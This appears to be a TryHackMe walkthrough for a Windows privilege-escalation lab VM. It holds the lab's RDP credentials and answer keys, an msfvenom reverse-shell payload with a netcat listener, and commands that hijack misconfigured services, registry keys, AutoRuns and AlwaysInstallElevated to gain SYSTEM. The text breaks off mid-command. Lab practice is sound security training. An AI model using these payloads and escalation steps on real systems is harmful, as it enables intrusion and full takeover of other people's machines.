TryhackMe Windows PrivEsc Walktrought

TryhackMe Windows PrivEsc

Practice your skills with this TryhackMe Windows PrivEsc on an intentionally misconfigured Windows VM with multiple ways to get admin/SYSTEM! RDP is available. Credentials: user:password321

TryhackMe Windows PrivEsc
TryhackMe Windows PrivEsc

Windows PrivEsc v1.0

Task 1 – Deploy the Machine

IP: 10.10.187.249

User: user

Password: password321

Protocol: RDP

xfreerdp /u:user /p:password321 /cert:ignore /v:10.10.187.249

Make sure you are connected to the TryHackMe VPN or using the in-browser Kali instance before trying to access the Windows VM!

TryhackMe Windows PrivEsc Walktrought

Task2 – Generate a Reverse Shell Executable

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=53 -f exe -o reverse.exe
sudo nc -nvlp 53

Send generated reverse shell into Windows system

copy \\10.10.10.10\kali\reverse.exe C:\PrivEsc\reverse.exe
C:\PrivEsc\reverse.exe

Task3 – Service Exploits – Insecure Service Permissions

C:\PrivEsc\accesschk.exe /accepteula -uwcqv user daclsvc
sc qc daclsvc
sc config daclsvc binpath= "\"C:\PrivEsc\reverse.exe\""
net start daclsvc

What is the original BINARY_PATH_NAME of the daclsvc service?

C:\Program Files\DACL Service\daclservice.exe

Task4 – Service Exploits – Unquoted Service Path

sc qc unquotedsvc
C:\PrivEsc\accesschk.exe /accepteula -uwdq "C:\Program Files\Unquoted Path Service\" 
copy C:\PrivEsc\reverse.exe "C:\Program Files\Unquoted Path Service\Common.exe"
net start unquotedsvc

What is the BINARY_PATH_NAME of the unquotedsvc service?

C:\Program Files\Unquoted Path Service\Common Files\unquotedpathservice.exe

Task 5 – Service Exploits – Weak Registry Permissions

sc qc regsvc
C:\PrivEsc\accesschk.exe /accepteula -uvwqk HKLM\System\CurrentControlSet\Services\regsvc
reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND_SZ /d C:\PrivEsc\reverse.exe /f
net start regsvc

Task 6 – Service Exploits – Insecure Service Executables

sc qc filepermsvc
C:\PrivEsc\accesschk.exe /accepteula -quvw "C:\Program Files\File Permissions Service\filepermservice.exe"
copy C:\PrivEsc\reverse.exe "C:\Program Files\File Permissions Service\filepermservice.exe" /Y
net start filepermsvc

Task 7 – Registry – AutoRuns

reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
C:\PrivEsc\accesschk.exe /accepteula -wvu "C:\Program Files\Autorun Program\program.exe"
copy C:\PrivEsc\reverse.exe "C:\Program Files\Autorun Program\program.exe" /Y
rdesktop 10.10.187.249

TAsk 8 – Registry – AlwaysInstallElevated

reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=53 -f msi -o revers
TryhackMe Windows PrivEsc Walktrought
TryhackMe Windows PrivEsc Walktrought
TryhackMe Windows PrivEsc Walktrought